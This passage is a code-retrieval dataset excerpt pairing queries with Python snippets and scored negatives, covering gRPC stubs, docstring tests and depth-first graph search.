"0.51770014", "0.51718605", "0.5163659", "0.5162326", "0.5162326", "0.5161769", "0.51591885", "0.5157628", "0.5145468", "0.51423216", "0.5138763" ]
0.0
-1
Missing associated documentation comment in .proto file.
def DumpV2(self, request, context): context.set_code(grpc.StatusCode.UNIMPLEMENTED) context.set_details('Method not implemented!') raise NotImplementedError('Method not implemented!')
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def init_doc(self):\n raise NotImplementedError()", "def inherits_doc():\n pass", "def documentation_only():\n pass", "def DocString():\n return", "def test_module_doc(self):\n self.assertTrue(len(base.__doc__) > 0)", "def pythondoc(self, irc, msg, args, num, req):\n self.googleq('http://docs.python.org/library/', req, num, irc)", "def cppdoc(self, irc, msg, args, num, req):\n self.googleq('www.cplusplus.com/reference/', req, num, irc)", "def testDocstring(self):\n class NotImportant(messages.Enum):\n \"\"\"I have a docstring.\"\"\"\n\n VALUE1 = 1\n\n self.assertEquals('I have a docstring.', NotImportant.__doc__)", "def test_module_doc(self):\n self.assertTrue(len(base_model.__doc__) > 0)", "def phpdoc(self, irc, msg, args, num, req):\n self.googleq('http://php.net/manual/en/', req, num, irc)", "def strip_doc_string(proto: google.protobuf.message.Message) -> None:\n if not isinstance(proto, google.protobuf.message.Message):\n raise TypeError(\n f\"proto must be an instance of {google.protobuf.message.Message}.\"\n )\n for descriptor in proto.DESCRIPTOR.fields:\n if descriptor.name == \"doc_string\":\n proto.ClearField(descriptor.name)\n elif descriptor.type == descriptor.TYPE_MESSAGE:\n if descriptor.label == descriptor.LABEL_REPEATED:\n for x in getattr(proto, descriptor.name):\n strip_doc_string(x)\n elif proto.HasField(descriptor.name):\n strip_doc_string(getattr(proto, descriptor.name))", "def docstring_hack():\n pass", "def check_documentation(self):\n\n self.assertIsNotNone(BaseModel.__doc__)\n self.assertIsNotNone(__init__.__doc__)\n self.assertIsNotNone(__str__.__doc__)\n self.assertIsNotNone(save.__doc__)\n self.assertIsNotNone(to_dict.__doc__)", "def consistent_documentation():\n\n return 3", "def test_init_doc(self):\n self.assertTrue(\n len(Review.__init__.__doc__) > 10\n )", "def test_missing_docstring(a, b): # noqa: D213, D407", "def test_docstring(self):\n self.assertIsNotNone(Review.__doc__)", "def test_docstring(self):\n self.assertTrue(len(BaseModel.__doc__) > 1)\n self.assertTrue(len(BaseModel.__init__.__doc__) > 1)\n self.assertTrue(len(BaseModel.__str__.__doc__) > 1)\n self.assertTrue(len(BaseModel.save.__doc__) > 1)\n self.assertTrue(len(BaseModel.to_dict.__doc__) > 1)", "def __doc__(self, ???):", "def test_class_doc(self):\n self.assertTrue(\n len(Review.__doc__) > 10\n )", "def test_module_doc(self):\n self.assertTrue(len(amenity.__doc__) > 0)", "def test_docstring(self):\n self.assertIsNotNone(Base.__doc__)", "def test_module_doc(self):\n self.assertTrue(len(r.__doc__) > 10)", "def test_docstring(self):\n self.assertIsNotNone(Place.__doc__)", "def test_documentation(self):\n self.assertTrue(hasattr(Base, \"__init__\"))\n self.assertTrue(hasattr(Base, \"create\"))\n self.assertTrue(hasattr(Base, \"to_json_string\"))\n self.assertTrue(hasattr(Base, \"from_json_string\"))\n self.assertTrue(hasattr(Base, \"save_to_file\"))\n self.assertTrue(hasattr(Base, \"load_from_file\"))\n self.assertTrue(Base.__init__.__doc__)\n self.assertTrue(Base.create.__doc__)\n self.assertTrue(Base.to_json_string.__doc__)\n self.assertTrue(Base.from_json_string.__doc__)\n self.assertTrue(Base.save_to_file.__doc__)\n self.assertTrue(Base.load_from_file.__doc__)", "def has_doc() -> None:", "def test_doc(self):\n self.assertTrue(len(max_integer.__doc__) > 0)\n self.assertTrue(len(__import__('6-max_integer').__doc__) > 0)", "def test_docstring(self):\n self.assertTrue(len(City.__doc__) > 1)\n self.assertTrue(len(City.__init__.__doc__) > 1)\n self.assertTrue(len(City.__str__.__doc__) > 1)\n self.assertTrue(len(City.save.__doc__) > 1)\n self.assertTrue(len(City.to_dict.__doc__) > 1)", "def test_docstring(self):\n self.assertIsNotNone(Review.__doc__)\n self.assertIsNotNone(Review.text.__doc__)", "def test_docstring(self):\n self.assertIsNotNone(BaseModel.__doc__)\n self.assertIsNotNone(BaseModel.__init__.__doc__)\n self.assertIsNotNone(BaseModel.save.__doc__)", "def fini_doc(self):\n raise NotImplementedError()", "def test_doc():\n pass", "def test_module_doc(self):\n self.assertTrue(len(user.__doc__) > 0)", "def lispdoc(self, irc, msg, args, num, req):\n self.googleq('http://lispdoc.com/', req, num, irc)", "def test_module_doc(self):\n self.assertTrue(len(models.amenity.__doc__) > 0)", "def bus_func_doc(self, bus):\n return None", "def test_doc2(self):\n assert Review.__doc__ is not None", "def c_comment(self, token: Token):\n if token.value.startswith(\"/**\"):\n self.doc_comments.append(PrefixCppDocComment(token))", "def test_module_doc(self):\n self.assertTrue(len(State.__doc__) > 0)", "def test_module_doc(self):\n self.assertTrue(len(db_storage.__doc__) > 0)", "def test_BaseModel_cls_doc(self):\n self.assertIsNotNone(BaseModel.__doc__)", "def doc_string():\n pass # pass does nothing", "def test_docstrings(self):\n self.assertEqual(len(Rectangle.__doc__) > 0, True)\n self.assertTrue(hasattr(Rectangle, \"__init__\"))\n self.assertTrue(Rectangle.__init__.__doc__)\n self.assertTrue(hasattr(Rectangle, \"width\"))\n self.assertTrue(Rectangle.width.__doc__)\n self.assertTrue(hasattr(Rectangle, \"height\"))\n self.assertTrue(Rectangle.height.__doc__)\n self.assertTrue(hasattr(Rectangle, \"x\"))\n self.assertTrue(Rectangle.x.__doc__)\n self.assertTrue(hasattr(Rectangle, \"y\"))\n self.assertTrue(Rectangle.y.__doc__)\n self.assertTrue(hasattr(Rectangle, \"area\"))\n self.assertTrue(Rectangle.area.__doc__)\n self.assertTrue(hasattr(Rectangle, \"display\"))\n self.assertTrue(Rectangle.display.__doc__)\n self.assertTrue(hasattr(Rectangle, \"__str__\"))\n self.assertTrue(Rectangle.__str__.__doc__)\n self.assertTrue(hasattr(Rectangle, \"update\"))\n self.assertTrue(Rectangle.update.__doc__)\n self.assertTrue(hasattr(Rectangle, \"to_dictionary\"))\n self.assertTrue(Rectangle.to_dictionary.__doc__)", "def test_student_module_docstring(self):\n self.assertIsNot(student.__doc__, None,\n \"student.py needs a docstring\")\n self.assertTrue(len(student.__doc__) >= 1,\n \"student.py needs a docstring\")", "def test_documentation(self):\n doc = City.__doc__\n self.assertGreaterEqual(len(doc), 1)", "def test_Userdoc(self):\n self.assertNotEqual(len(User.__doc__), 0)", "def __init__ (self, docstring, name, isInternal):\n\n # Take out excess leading blank lines.\n docstring = re.sub('/\\*\\*(\\s+\\*)+', r'/** \\n *', docstring)\n\n self.docstring = docstring\n self.name = name\n self.isInternal = isInternal", "def test_module_doc(self):\n self.assertTrue(len(city.__doc__) > 0)", "def _add_doc(func, doc):\r\n func.__doc__ = doc", "def _add_doc(func, doc):\r\n func.__doc__ = doc", "def _add_doc(func, doc):\r\n func.__doc__ = doc", "def test_BaseModel_methods_doc(self):\n self.assertIsNotNone(BaseModel.__init__.__doc__)\n self.assertIsNotNone(BaseModel.__str__.__doc__)\n self.assertIsNotNone(BaseModel.save.__doc__)\n self.assertIsNotNone(BaseModel.to_dict.__doc__)", "def javadoc(self, irc, msg, args, num, req):\n self.googleq('download.oracle.com/javase/6/docs/', req, num, irc)", "def implement(self):\n\t#@DEBUG remove comments", "def magic_pdoc(self, parameter_s=''):\n self._inspect('pdoc',parameter_s)", "def dummy(doc):\r\n return doc", "def _add_doc(func, doc):\n func.__doc__ = doc", "def test_proto_spec(self):\n proto_name = 'org.xlattice.upax'\n node_reg = reg.NodeReg()\n proto_reg = reg.ProtoReg(proto_name, node_reg)\n msg_reg = reg.MsgReg(proto_reg)\n proto_spec = M.ProtoSpec(proto_name, proto_reg)\n self.assertEqual(proto_name, proto_spec.name)\n parent = M.ProtoSpec(proto_name, proto_reg)\n\n msg_name = 'logEntry'\n # the enum is not used\n enum = M.EnumSpec.create('Joe', [\n ('oh', 92), ('hello', 47), ('there', 322), ])\n fields = [\n # pylint: disable=no-member\n M.FieldSpec(\n msg_reg,\n 'timestamp',\n FieldTypes.F_UINT32,\n Quants.REQUIRED,\n 0),\n M.FieldSpec(\n msg_reg,\n 'node_id',\n FieldTypes.F_BYTES20,\n Quants.REQUIRED,\n 1),\n M.FieldSpec(\n msg_reg,\n 'key',\n FieldTypes.F_BYTES20,\n Quants.REQUIRED,\n 2),\n M.FieldSpec(\n msg_reg,\n 'length',\n FieldTypes.V_UINT32,\n Quants.REQUIRED,\n 3),\n M.FieldSpec(\n msg_reg,\n 'by_',\n FieldTypes.L_STRING,\n Quants.REQUIRED,\n 4),\n M.FieldSpec(\n msg_reg,\n 'path',\n FieldTypes.L_STRING,\n Quants.REQUIRED,\n 5),\n ]\n msg_spec = M.MsgSpec(msg_name, msg_reg, proto_spec)\n self.assertEqual(msg_name, msg_spec.name)\n for file in fields:\n msg_spec.add_field(file)\n\n # proto_spec.add_msg(msg_spec) # correctly commented out\n self.round_trip_poto_spec_via_string(proto_spec) # GEEP", "def test_student_class_docstring(self):\n self.assertIsNot(Student.__doc__, None,\n \"Student class needs a docstring\")\n self.assertTrue(len(Student.__doc__) >= 1,\n \"Student class needs a docstring\")", "def main_docstring():", "def test_docstring(self):\n self.assertTrue(len(FileStorage.__doc__) > 1)\n self.assertTrue(len(FileStorage.all.__doc__) > 1)\n self.assertTrue(len(FileStorage.new.__doc__) > 1)\n self.assertTrue(len(FileStorage.save.__doc__) > 1)\n self.assertTrue(len(FileStorage.reload.__doc__) > 1)", "def describe(self):\n return \"The method describe() is not implemented\"", "def test_console_documented(self):\n self.assertTrue\n self.assertTrue\n (len(HBNBCommand.__doc__) >= 1)", "def test_class_docstrings(self):\n self.assertGreater(len(self.storage.__doc__), 1)", "def __init__(self, proto):\n self.proto = proto", "def func_doc():", "def get_documentation(self, *args, **dargs):\n pass", "def __init__ (self, isInternal, docstring, name, args, isConst):\n\n self.name = name\n self.isConst = isConst\n self.isInternal = isInternal\n\n if isInternal:\n if language == 'java':\n # We have a special Javadoc doclet that understands a non-standard\n # Javadoc tag, @internal. When present in the documentation string\n # of a method, it causes it to be excluded from the final\n # documentation output. @internal is something doxygen offers.\n #\n p = re.compile('(\\s+?)\\*/', re.MULTILINE)\n self.docstring = p.sub(r'\\1* @internal\\1*/', docstring)\n elif language == 'csharp':\n # We mark internal methods in a different way for C#.\n self.docstring = docstring\n else:\n self.docstring = \" @internal\\n\" + docstring\n else:\n self.docstring = docstring\n\n # In Java and C#, if a method is const and swig has to translate the type,\n # then for some reason swig cannot match up the resulting doc strings\n # that we put into %javamethodmodifiers. The result is that the java\n # documentation for the methods are empty. I can't figure out why, but\n # have figured out that if we omit the argument list in the doc string\n # that is put on %javamethodmodifiers for such case, swig does generate \n # the comments for those methods. This approach is potentially dangerous\n # because swig might attach the doc string to the wrong method if a\n # methods has multiple versions with varying argument types, but the\n # combination doesn't seem to arise in antimony currently, and anyway,\n # this fixes a real problem in the Java documentation for antimony.\n\n if language == 'java' or language == 'csharp':\n if isConst and (args.find('unsigned int') >= 0):\n self.args = ''\n elif not args.strip() == '()':\n if isConst:\n self.args = args + ' const'\n else:\n self.args = args\n else:\n if isConst:\n self.args = '() const'\n else:\n self.args = ''\n else:\n self.args = args", "def guess(cls, docstring):", "def HandleMissingParameterDoc(self, token, param_name):\n raise TypeError('Abstract method HandleMissingParameterDoc not implemented')", "def shortDescription(self):\n # Suppress default logging of docstrings.\n return None", "def docs():", "def __init__(self):\n super(MethodInfo, self).__init__()\n self.DocString = None", "def test_file_storage_module_docstring(self):\n self.assertIsNot(file_storage.__doc__, None,\n \"file_storage.py needs a docstring\")\n self.assertTrue(len(file_storage.__doc__) >= 1,\n \"file_storage.py needs a docstring\")", "def handle_protobuf(self, message: protobuf.ProtocolMessage) -> None:", "def test_doc_file(self):\n expected = 'City class handles all application cities'\n actual = City.__doc__\n self.assertEqual(expected, actual)", "def missed_needed_docstring(self):\n self.needed += 1\n self.missing += 1", "def test_documentation(self):\n self.assertTrue(hasattr(Rectangle, \"__init__\"))\n self.assertTrue(Rectangle.__init__.__doc__)\n self.assertTrue(hasattr(Rectangle, \"width\"))\n self.assertTrue(Rectangle.width.__doc__)\n self.assertTrue(hasattr(Rectangle, \"height\"))\n self.assertTrue(Rectangle.height.__doc__)\n self.assertTrue(hasattr(Rectangle, \"x\"))\n self.assertTrue(Rectangle.x.__doc__)\n self.assertTrue(hasattr(Rectangle, \"y\"))\n self.assertTrue(Rectangle.y.__doc__)\n self.assertTrue(hasattr(Rectangle, \"area\"))\n self.assertTrue(Rectangle.area.__doc__)\n self.assertTrue(hasattr(Rectangle, \"display\"))\n self.assertTrue(Rectangle.display.__doc__)\n self.assertTrue(hasattr(Rectangle, \"__str__\"))\n self.assertTrue(Rectangle.__str__.__doc__)\n self.assertTrue(hasattr(Rectangle, \"update\"))\n self.assertTrue(Rectangle.update.__doc__)\n self.assertTrue(hasattr(Rectangle, \"to_dictionary\"))\n self.assertTrue(Rectangle.to_dictionary.__doc__)", "def __init__(\n self,\n *,\n public_comment: typing.Optional[str] = None,\n status: typing.Optional[Assignment.Status] = None\n ) -> None:\n ...", "def test_class_doc(self):\n self.assertTrue(len(City.__doc__) > 0)", "def test_doc1(self):\n assert models.review.__doc__ is not None", "def test_doctest(self):\n self.assertTrue(BaseModel.__doc__)\n self.assertTrue(BaseModel.__init__.__doc__)\n self.assertTrue(BaseModel.__str__.__doc__)\n self.assertTrue(BaseModel.save.__doc__)\n self.assertTrue(BaseModel.to_dict.__doc__)", "def should_add_pr_comment(self):\n pass", "def test_findDocumentation(self):\n doc = self.builder._findChanges(\n self.project, self.builder._DOC)\n self.assertEquals(\n doc,\n [(40, 'foo.bar.Baz.quux'),\n (41, 'writing Foo servers')])", "def test_doc_with_comments():\n doc = CoNLL.conll2doc(input_str=RUSSIAN_SAMPLE)\n check_russian_doc(doc)", "def test_method_docs(self):\n for func in dir(Base):\n self.assertTrue(len(func.__doc__) > 0)", "def public_fn_with_googley_docstring(self, name, another, state=None):\n return 0", "def test_state_class_docstring(self):\n self.assertIsNot(State.__doc__, None,\n \"docstring not found in State class\")\n self.assertTrue(len(State.__doc__) >= 1,\n \"docstring not found in State class\")", "def getStructPb2():\n return struct_pb2", "def to_proto(self) -> None:\n\n pass", "def test_doc_string():\n # Create fake profiles library by named tuples\n faker_db = session10.create_fake_library_by_namedtuple(10)\n\n assert len(faker_db.__doc__) > 0 , \"Doc string is missing\"", "def test_swagger_field_is_required():\n raw_schema = RawSchemaFactory()\n raw_schema.pop('swagger', None)\n\n assert 'swagger' not in raw_schema\n\n with pytest.raises(ValidationError) as err:\n swagger_schema_validator(raw_schema)\n\n assert_message_in_errors(\n MESSAGES['required']['required'],\n err.value.detail,\n 'required.swagger',\n )", "def brief_documentation(method: object) -> str:\n doc = method.__doc__\n if doc is not None:\n lines = doc.splitlines()\n if len(lines) > 0:\n return lines[0]\n return ''", "def proto_generation_callable(self):\n raise NotImplementedError()", "def proto_generation_callable(self):\n raise NotImplementedError()", "def document(self):\n ...", "def assert_doc_extensions(doc):\n pass", "def comment():", "def test_doc_module(self):\n from models import user\n\n self.assertTrue(len(user.__doc__) > 0)\n self.assertTrue(len(user.User.__doc__) > 0)", "def test_doc(cls, type_str):\n do_doc_test(cls, type_str)", "def test_docstring(self):\n self.assertIsNotNone(City.__doc__)" ]
[ "0.6348721", "0.6232983", "0.6227791", "0.6107919", "0.6073252", "0.6056996", "0.60199225", "0.5997295", "0.5973073", "0.59475285", "0.59426475", "0.59348774", "0.59195995", "0.59041727", "0.5899058", "0.5865414", "0.5857725", "0.5836395", "0.57917976", "0.57693964", "0.5765628", "0.5738139", "0.5725729", "0.57218313", "0.57099766", "0.5694849", "0.5634908", "0.5631503", "0.562838", "0.5627863", "0.5609239", "0.55800056", "0.5575202", "0.5568366", "0.5556774", "0.554996", "0.55403715", "0.5535095", "0.55324805", "0.55324376", "0.5515471", "0.551169", "0.5499882", "0.54952186", "0.54851204", "0.547969", "0.54744124", "0.5465293", "0.5460546", "0.5460546", "0.5460546", "0.5452012", "0.54468", "0.542486", "0.54212755", "0.5413558", "0.5397512", "0.53957206", "0.53943235", "0.5388301", "0.5376187", "0.5353345", "0.534334", "0.5337087", "0.5336514", "0.53339815", "0.5328619", "0.53255814", "0.53247285", "0.5322686", "0.5319762", "0.53191066", "0.53140306", "0.53077936", "0.5279659", "0.5267621", "0.5264218", "0.5252085", "0.5219406", "0.5217774", "0.5214222", "0.5213382", "0.52094376", "0.52063346", "0.5204785", "0.5193972", "0.5189197", "0.51867706", "0.5182037", "0.51802737", "0.5177115", "0.5172607", "0.5164527", "0.51625025", "0.51625025", "0.5162299", "0.5160613", "0.5157092", "0.51471317", "0.5142684", "0.51393735" ]
0.0
-1
depthfirst search, mark visited in place O(n), O(1)
def maxAreaOfIsland(self, grid): def helper(x, y): if x < 0 or x >= len(grid) or y < 0 or y >= len(grid[0]) or grid[x][y] == 'X': return 0 if grid[x][y] == 1: grid[x][y] = 'X' return 1 + helper(x - 1, y) + helper(x + 1, y) + helper(x, y + 1) + helper(x, y - 1) else: grid[x][y] = 'X' return 0 max_area = 0 for i in range(len(grid)): for j in range(len(grid[0])): max_area = max(max_area, helper(i, j)) return max_area """ - depth-first search, recursive, mark visited in a set - O(n), O(n) """ visited = set() # can use global variable instead of passing into stack def helper(x, y): if x < 0 or x >= len(grid) or y < 0 or y >= len(grid[0]) or (x, y) in visited: return 0 visited.add((x, y)) if grid[x][y] == 1: return 1 + helper(x - 1, y) + helper(x + 1, y) + helper(x, y + 1) + helper(x, y - 1) else: return 0 max_area = 0 for i in range(len(grid)): for j in range(len(grid[0])): max_area = max(max_area, helper(i, j)) return max_area """ - depth-first search, iterative, mark visited in a set - O(n), O(n) """ max_area = 0 visited = set() row, col = len(grid), len(grid[0]) for i in range(row): for j in range(col): area = 0 n = grid[i][j] stack = [(i, j)] # use stack to track all neighbors (all need to be searched) while stack: x, y = stack.pop() if 0 <= x < row and 0 <= y < col and (x, y) not in visited: visited.add((x, y)) if grid[x][y] == 1: area += 1 stack += [(x + 1, y), (x - 1, y), (x, y + 1), (x, y - 1)] max_area = max(max_area, area) return max_area
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def depth_first_search(problem):\r\n \"*** YOUR CODE HERE ***\"\r\n fringe = []\r\n path = set()\r\n final = []\r\n acts = dict()\r\n state = problem.get_start_state()\r\n fringe.append(state)\r\n\r\n while(len(fringe) > 0):\r\n state = fringe.pop()\r\n path.add(state)\r\n states = problem.get_successors(state)\r\n acts[state] = states[:]\r\n if problem.is_goal_state(state):\r\n break\r\n\r\n #states = problem.get_successors(state)\r\n for stat in states:\r\n if stat[0] not in path and stat[0] not in fringe:\r\n fringe.append(stat[0])\r\n\r\n while(True):\r\n if state == problem.get_start_state():\r\n break\r\n for key, val in acts.items():\r\n for va in val: #( x, y, z)\r\n if va[0] == state:\r\n final.append(va[1])\r\n state = key\r\n break\r\n else:\r\n continue\r\n break\r\n\r\n final.reverse()\r\n\r\n return final", "def recursive_dft(self, start, visited=[]):\n if start not in visited:\n visited.append(start)\n for i in self.neighbors(start):\n self.recursive_dft(i, visited)\n return visited", "def depthFirstSearch(problem):\n \"*** YOUR CODE HERE ***\"\n\n \"\"\"\n ALGORITH FOR DFS\n \n function graph-search(problem, fringe) retuen a sloution or failure\n \n closed <-- an empty set\n fringe <-- insert (make-node (initial-state [problem]), fringe)\n \n loop do :\n if fringe is empty then return failure\n node <-- Remove-front (fringe)\n if goal-test (problem, state[node]) then return node\n if state[node] is not in closed then \n add STATE[node] to closed\n for child-node in EXPAND(STATE[node],problem) do\n fringe <-- Insert (child-node, fringe)\n end\n end\n \"\"\"\n\n templist=[]\n explored = set()\n fringe = util.Stack()\n #print \"the stat node is : \", problem.getStartState()\n\n fringe.push((problem.getStartState(),templist))\n while (not fringe.isEmpty()):\n (currentNode,currDir) = fringe.pop()\n # print \"Pacman is currently at : \", currentNode\n if problem.isGoalState(currentNode):\n # print \" Goal State Found : \", currentNode\n pathToGoal = currDir\n break\n if not (currentNode in explored):\n # print \"Adding current node to explored\"\n explored.add(currentNode)\n for childNode in problem.getSuccessors(currentNode):\n # print \"child node : \", childNode , \" is added \"\n fringe.push((childNode[0],currDir+[childNode[1]]))\n\n return pathToGoal", "def depthFirstSearch(problem):\r\n \"*** YOUR CODE HERE ***\"\r\n node = problem.getStartState()\r\n if (problem.isGoalState(node)):\r\n return [] # no need to make any moves of the start state is goal\r\n start = (node, 'NoDirection',0)\r\n\r\n frontier_queue = Stack() # queue for frontier\r\n frontier_queue.push(start) # frontier consists of only the start state\r\n\r\n explored_nodes = set()\r\n explored_track = {start:None} # keep a track of parent, parent of root node is None\r\n\r\n while not frontier_queue.isEmpty():\r\n state = frontier_queue.pop() # pop the top element from the queue \r\n explored_nodes.add(state)\r\n\r\n if problem.isGoalState(state[0]):\r\n return get_track(explored_track, state)\r\n\r\n neighbors_state = problem.getSuccessors(state[0])\r\n for neighbor in neighbors_state: # neighbor will be something like this ((34, 15), 'South', 1)\r\n if neighbor not in frontier_queue.list and neighbor not in explored_nodes:\r\n frontier_queue.push(neighbor)\r\n explored_track[neighbor] = state\r\n\r\n\r\n def get_track(explored_track, state):\r\n from game import Directions\r\n track_history = [state]\r\n track_history_direction = []\r\n leaf = state\r\n while (explored_track[leaf]) != start:\r\n track_history.append(explored_track[leaf])\r\n leaf = explored_track[leaf]\r\n\r\n for j in range (len(track_history),-1,-1):\r\n this_step = track_history[j-1]\r\n this_step = this_step[1]\r\n track_history_direction.append(this_step)\r\n return track_history_direction[:-1]", "def depthFirstSearch(problem):\n \"*** YOUR CODE HERE ***\"\n fringe = util.Stack()\n return GraphSearch(problem, 'dfs').search(fringe)", "def depthFirstSearch(problem):\n \"*** YOUR CODE HERE ***\"\n from util import Stack\n \n st = Stack()\n mapper = {}\n mapper[problem.getStartState()] = None\n\n st.push(problem.getStartState())\n while not(st.isEmpty()):\n vertex = st.pop()\n \n if (problem.isGoalState(vertex)):\n c = vertex\n l = []\n while mapper[c] != None:\n tup = mapper[c]\n l.append(tup[1])\n c = tup[0]\n l.reverse()\n print l\n return l\n\n else:\n neigh = problem.getSuccessors(vertex)\n # neigh.reverse()\n # neigh.sort()\n for child in neigh:\n if child[0] not in mapper:\n st.push(child[0])\n mapper[child[0]] = (vertex, child[1])\n # print mapper\n \n # visited = []\n # p = dfsRecursive(problem, problem.getStartState(), st, visited, [])\n # return p\n \n # pathfind = {}\n # st.push(problem.getStartState())\n # iterative approach:\n # while (not st.isEmpty()):\n # point = st.pop() # (x,y)\n # if problem.isGoalState(point):\n # # print point\n # print pathfind\n # # print visited\n # elif (not (point in visited)):\n # visited.append(point)\n # # print pathfind, '\\n'\n # print visited, '\\n'\n # for child in problem.getSuccessors(point):\n # st.push(child[0])\n # pathfind[child[0]] = point #this preemptively adds!\n # util.raiseNotDefined()", "def iterativeDeepeningSearch(problem):\n from util import Stack\n \n for max_depth in range(0, 10000000):\n # print max_depth\n st = Stack()\n mapper = {}\n mapper[(problem.getStartState(), 0)] = None #map of (childpos, depth): (parentpos, direction, depth)\n st.push((problem.getStartState(), 0)) # stack of ((x,y) , depth)\n\n while not(st.isEmpty()):\n vertex = st.pop() #( (x,y) , depth )\n depth = vertex[1]\n\n if (problem.isGoalState(vertex[0])):\n c = vertex\n l = []\n while mapper[c] != None:\n tup = mapper[c]\n l.append(tup[1])\n c = tup[0], tup[2]\n l.reverse()\n print \"max_depth: \", max_depth\n print l\n return l\n\n else:\n n_depth = depth + 1 # new depth\n if n_depth < max_depth:\n neigh = problem.getSuccessors(vertex[0])\n # neigh.reverse()\n for child in neigh:\n if (child[0], n_depth) not in mapper:\n st.push((child[0], n_depth))\n mapper[(child[0], n_depth)] = (vertex[0], child[1], depth)", "def depth_first_graph_search(problem):\n\n\tfrontier = [(Node(problem.initial))] # Stack (implemented as a list)\n\n\texplored = set()\n\twhile frontier:\n\t\tnode = frontier.pop()\n\t\tif problem.goal_test(node.state):\n\t\t\treturn node\n\t\texplored.add(node.state)\n\t\tfrontier.extend(child for child in node.expand(problem)\n\t\t\t\t\t\tif child.state not in explored and child not in frontier)\n\treturn None", "def recursive_search(i, F, t, s, explored, leaders, order):\n x = len(explored)\n if x % 10 == 0:\n print(\"Length of explored: {}\".format(x))\n explored.append(i)\n if order == 2:\n leaders[i] = s\n arc_list = db.Database.find_one(collection=\"biggraph\", query={\"key\": i})\n if arc_list:\n for node in arc_list['value']:\n if node not in explored:\n F, t, leaders, explored = recursive_search(node, F, t, s, explored, leaders, order)\n if order == 1:\n t += 1\n F[i] = t\n return F, t, leaders, explored", "def depthFirstSearch(problem):\r\n\t\"*** YOUR CODE HERE ***\"\r\n\r\n\tfrontera = util.Stack()\r\n\testadoInicial= problem.getStartState()\r\n\tfrontera.push((estadoInicial, [],0))\r\n\tvisitados=[]\r\n\tvisitados.append(estadoInicial)\r\n\r\n\twhile not(frontera.isEmpty()):\r\n\t\t(estado, camino, costo) =frontera.pop()\r\n\t\tif(problem.isGoalState(estado)):\r\n\t\t\tbreak\r\n\r\n\t\tsucesores=problem.getSuccessors(estado)\r\n\t\tfor sucesor in sucesores:\r\n\t\t\tif sucesor[0] not in visitados:\r\n\t\t\t\tfrontera.push((sucesor[0], camino + [sucesor[1]], costo + sucesor[2]))\r\n\t\t\t\tvisitados.append(sucesor[0])\r\n\tprint ('Cantidad de nodos en memoria: {}').format(len(frontera.list))\r\n\treturn camino", "def dfs(n):\n if seen[n]: return seen[n] == 1 \n seen[n] = 1\n if any(dfs(nn) for nn in digraph.get(n, set())): return True \n seen[n] = 2\n return False", "def depthFirstSearch(problem):\n \"*** YOUR CODE HERE ***\"\n frontier = util.Stack()\n start_node = problem.getStartState()\n\n if problem.isGoalState(start_node):\n return ['Stop']\n frontier.push((start_node,[]))\n explored = set()\n while True:\n if frontier.isEmpty():\n return []\n node = frontier.pop()\n explored.add(node[0])\n for successor in problem.getSuccessors(node[0]):\n nextState, action, cost = successor\n if nextState in explored or nextState in [f[0] for f in frontier.list]:\n continue\n actions = node[1][:]\n actions.append(action)\n new_node = (nextState, actions)\n if problem.isGoalState(new_node[0]):\n return new_node[1]\n frontier.push(new_node)\n #print frontier.list\n return []", "def search(G):\n visited = set()\n \n for v in range(len(G)):\n if v not in visited:\n yield v,v,forward\n visited.add(v)\n stack = [(v,iter(G[v]))]\n while stack:\n parent,children = stack[-1]\n try:\n child = next(children)\n if child in visited:\n yield parent,child,nontree\n else:\n yield parent,child,forward\n visited.add(child)\n stack.append((child,iter(G[child])))\n except StopIteration:\n stack.pop()\n if stack:\n yield stack[-1][0],parent,reverse\n yield v,v,reverse", "def depthFirstSearch(problem):\n container = util.Stack() \n return depthOrBreadthFirstSearch(problem, container)", "def depthFirstSearch(problem):\n \"*** YOUR CODE HERE ***\"\n \n #Stack to hold the node that have been visited along with the path taken from the start node to reach that node.\n stack = Stack()\n #Set to hold the node explored.\n explorednode = set()\n #Get the start node.\n startnode = problem.getStartState()\n #Push the starting node on the Stack along with an empty set to know the direction in order to reach the node.\n stack.push((startnode,[]))\n #Loop till the stack is empty\n while stack.isEmpty() is not True:\n #Pop the currentnode and the direction from the stack\n currentnode, direction = stack.pop()\n #We will now add the node to set of explored node.\n explorednode.add(currentnode)\n #If the node is the goal. We made it!!\n if problem.isGoalState(currentnode):\n #print currentnode, direction\n #The direction holds the way to reach till the goal from the start node.\n #print direction\n return direction\n #Loop for each successor(child) of the current node.\n for (successor, action, stepCost) in problem.getSuccessors(currentnode):\n #If the successor(child) is not explored\n if successor not in explorednode:\n #Add the successor to the stack along with the path to reach it.\n stack.push((successor, direction + [action]))", "def depthFirstSearch(problem):\n stack = Stack()\n\n visited = []\n parent_dict = dict()\n start_state = problem.getStartState()\n stack.push(start_state)\n current_path = []\n actions_dict = dict()\n final_actions = []\n flag = False\n\n if problem.isGoalState(problem.getStartState()):\n return []\n\n while not stack.isEmpty():\n current_state = stack.pop()\n current_path.append(current_state)\n visited.append(current_state)\n\n if problem.isGoalState(current_state):\n break\n\n successors = problem.getSuccessors(current_state)\n\n for s in successors:\n flag = False\n if s[0] not in visited:\n stack.push(s[0])\n parent_dict[s[0]] = current_state\n actions_dict[(current_state, s[0])] = s[1]\n flag = True\n\n\n\n if not successors and not stack.isEmpty() or flag is False:\n current_state = stack.pop()\n while current_path[-1] != parent_dict[current_state]:\n current_path.pop()\n stack.push(current_state)\n\n for i in range(len(current_path)-1):\n final_actions.append(actions_dict[current_path[i],current_path[i+1]])\n\n\n return final_actions", "def dft_recursive(self, starting_vertex, visited=None):\n \n # for vertex in self.get_neighbors(starting_vertex):\n # if vertex not in visited:\n # visited.add(vertex)\n # self.dft_recursive(vertex, visited)\n # return visited\n if visited == None:\n visited = set()\n print(starting_vertex)\n visited.add(starting_vertex)\n for v in self.get_neighbors(starting_vertex):\n if v not in visited:\n self.dft_recursive(v, visited)", "def depthFirstSearch(problem):\n \"*** YOUR CODE HERE ***\"\n \n from game import Directions\n visited = set() # unique elements\n state = problem.getStartState()\n #returns starting agent's position\n waiting_list = util.Stack()\n # LIFO\n # last in first out\n # parents = collections.defaultdict(collections.UserDict)\n parents = {}\n #dictionary\n sequence = []\n #LIFO\n for action in problem.getSuccessors(state):\n # in order to push full-state values\n waiting_list.push(action)\n # enumarating tuple\n\n while not waiting_list.isEmpty():\n state = waiting_list.pop()\n \n visited.add(state[0])\n # node is visited and we wont visit those nodes\n \n for substate in problem.getSuccessors(state[0]):\n # take a look to successors of current node\n \n if substate[0] not in visited:\n # if not in visited \n # saving 